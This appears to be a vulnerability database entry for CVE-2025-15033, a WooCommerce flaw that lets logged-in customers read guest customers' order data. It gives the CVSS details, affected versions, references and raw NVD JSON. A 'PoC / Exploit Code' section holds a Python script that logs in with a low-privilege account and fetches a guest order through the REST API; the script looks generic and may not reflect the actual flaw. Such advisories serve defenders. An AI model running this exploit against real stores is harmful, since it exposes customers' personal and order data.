CVE-2025-15033

Description

A vulnerability in WooCommerce 8.1 to 10.4.2 can allow logged-in customers to access order data of guest customers on sites with a certain configuration. This has been fixed in WooCommerce 10.4.3, as well as all the previously affected versions through point releases, starting from 8.1, where it has been fixed in 8.1.3. It does not affect WooCommerce 8.0 or earlier.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

WooCommerce 8.1 - 8.1.2

WooCommerce 8.2 - 8.x

WooCommerce 9.x

WooCommerce 10.0 - 10.4.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-15033 WooCommerce Guest Order Information Disclosure PoC # Requires authenticated user with low privileges import requests import sys TARGET_URL = "https://vulnerable-site.com" USERNAME = "[email protected]" PASSWORD = "password123" TARGET_ORDER_ID = 12345 # Guest order ID to target def exploit_cve_2025_15033(): """ Exploit for WooCommerce CVE-2025-15033 Information disclosure via unauthorized guest order access """ session = requests.Session() # Step 1: Authenticate with low-privilege account login_url = f"{TARGET_URL}/wp-login.php" login_data = { "log": USERNAME, "pwd": PASSWORD, "wp-submit": "Log In" } response = session.post(login_url, data=login_data) if "wordpress_logged_in" not in session.cookies: print("[-] Authentication failed") return None print("[+] Successfully authenticated") # Step 2: Attempt to access guest order data # WooCommerce REST API endpoint for orders order_url = f"{TARGET_URL}/wp-json/wc/v3/orders/{TARGET_ORDER_ID}" headers = { "Content-Type": "application/json" } response = session.get(order_url, headers=headers) if response.status_code == 200: order_data = response.json() print(f"[+] Successfully accessed guest order {TARGET_ORDER_ID}") print(f"[+] Order data leaked: {order_data}") return order_data else: print(f"[-] Failed to access order: {response.status_code}") return None if __name__ == "__main__": exploit_cve_2025_15033()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-15033
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-15033
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-15033/
[4] VulDB https://vuldb.com/cve/CVE-2025-15033
[5] https://wpscan.com/vulnerability/f55fd7d3-7fbe-474f-9406-f47f8aee5e57/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-15033", "sourceIdentifier": "[email protected]", "published": "2025-12-22T19:15:48.510", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability in WooCommerce 8.1 to 10.4.2 can allow logged-in customers to access order data of guest customers on sites with a certain configuration. This has been fixed in WooCommerce 10.4.3, as well as all the previously affected versions through point releases, starting from 8.1, where it has been fixed in 8.1.3. It does not affect WooCommerce 8.0 or earlier."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://wpscan.com/vulnerability/f55fd7d3-7fbe-474f-9406-f47f8aee5e57/", "source": "[email protected]"}]}}